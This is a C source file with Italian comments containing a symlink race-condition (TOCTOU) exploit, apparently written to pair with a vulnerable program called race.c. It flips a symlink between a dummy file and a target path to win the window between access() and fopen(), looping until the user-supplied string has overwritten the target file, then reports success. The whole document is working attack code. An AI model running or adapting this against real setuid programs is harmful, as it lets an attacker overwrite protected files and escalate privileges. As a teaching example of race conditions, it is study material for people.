#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <sched.h>

#define NAME_LEN 8
#define STR_LEN 1024

struct file
{
  char *name;
  char *name2;
  char *string;
  char *string2;

};


struct file *need;



void inizializate ()
{
  if ((need = (struct file *) malloc (sizeof (struct file))) == NULL)
    exit (-1);
  if ((need->name = (char *) malloc (NAME_LEN)) == NULL)
    exit (-1);
  if ((need->name2 = (char *) malloc (NAME_LEN)) == NULL)
    exit (-1);
  if ((need->string = (char *) malloc (STR_LEN)) == NULL)
    exit (-1);
  if ((need->string2 = (char *) malloc (STR_LEN)) == NULL)
    exit (-1);
}



int getrace (char *file2, char *string)
{

  FILE *rac, *to;



  inizializate ();


  /*
    Azzero la memoria allocata dalla malloc()
   */
  memset(need->name, 0, NAME_LEN);

  /*
    Usando un size di NAME_LEN - 1 assicuro che la stringa
    sia sempre null-terminata
   */
  strncpy (need->name, "toexl", NAME_LEN - 1);

  strncpy (need->name2, "alias", NAME_LEN);
  need->name2[NAME_LEN - 1] = 0;
  strncpy (need->string2, string, STR_LEN);
  need->string2[STR_LEN - 1] = 0;

  if ((rac = fopen (need->name, "wr+")) == NULL)
    {
      perror ("fopen");
      exit (-1);
    }





  /*
    Verifica se la race condition ha avuto luogo e continua fino a che race.c
    non ha scritto nel file la stringa specificata
   */
  while (strncmp (need->string, need->string2, strlen (need->string2)) != 0)

    {

      /*
        Crea un link simbolico al file "toexl"
       */
      if ((symlink (need->name, need->name2)) != 0)
	{
	  perror ("link");
	  exit (-1);
	}



      if ((unlink (need->name2) != 0))
	{
	  perror ("unlink");
	  exit (-1);
	}

      /*
        Dopo aver eliminato il link precedente, crea un link simbolico
	al file da sovrascrivere.
	Affinch la race condition abbia luogo bisogna che ci si verifichi tra
	la chiamata ad access() e la chiamata a fopen() in race.c
       */
      if ((symlink (file2, need->name2)) != 0)
	{
	  fprintf (stderr, "Failed\n");

	  exit (-1);
	}



       /*
         Legge il contenuto del file da sovrascrivere per eseguire un successivo
	 confronto mediante strncmp() al fine di verificare se la race condition ha avuto
	 luogo
	*/
      if ((to = fopen (file2, "r")))
	{
	  fgets (need->string, STR_LEN, to);

	  fclose (to);
	}
      if ((unlink (need->name2) != 0))
	{
	  perror ("unlink");
	  exit (-1);
	}

    }


  fclose (rac);


  return 2;
};



int
main (int argc, char **argv)
{







  if (argc != 3)
    {

      printf ("USAGE:%s   filetosubscribe string\n", argv[0]);
      exit (0);
    }





  if ((getrace (argv[1], argv[2])) == 2)
    {



      printf ("Well done , we have rewrite the %s file.\n", argv[1]);

    }



  return 0;

}
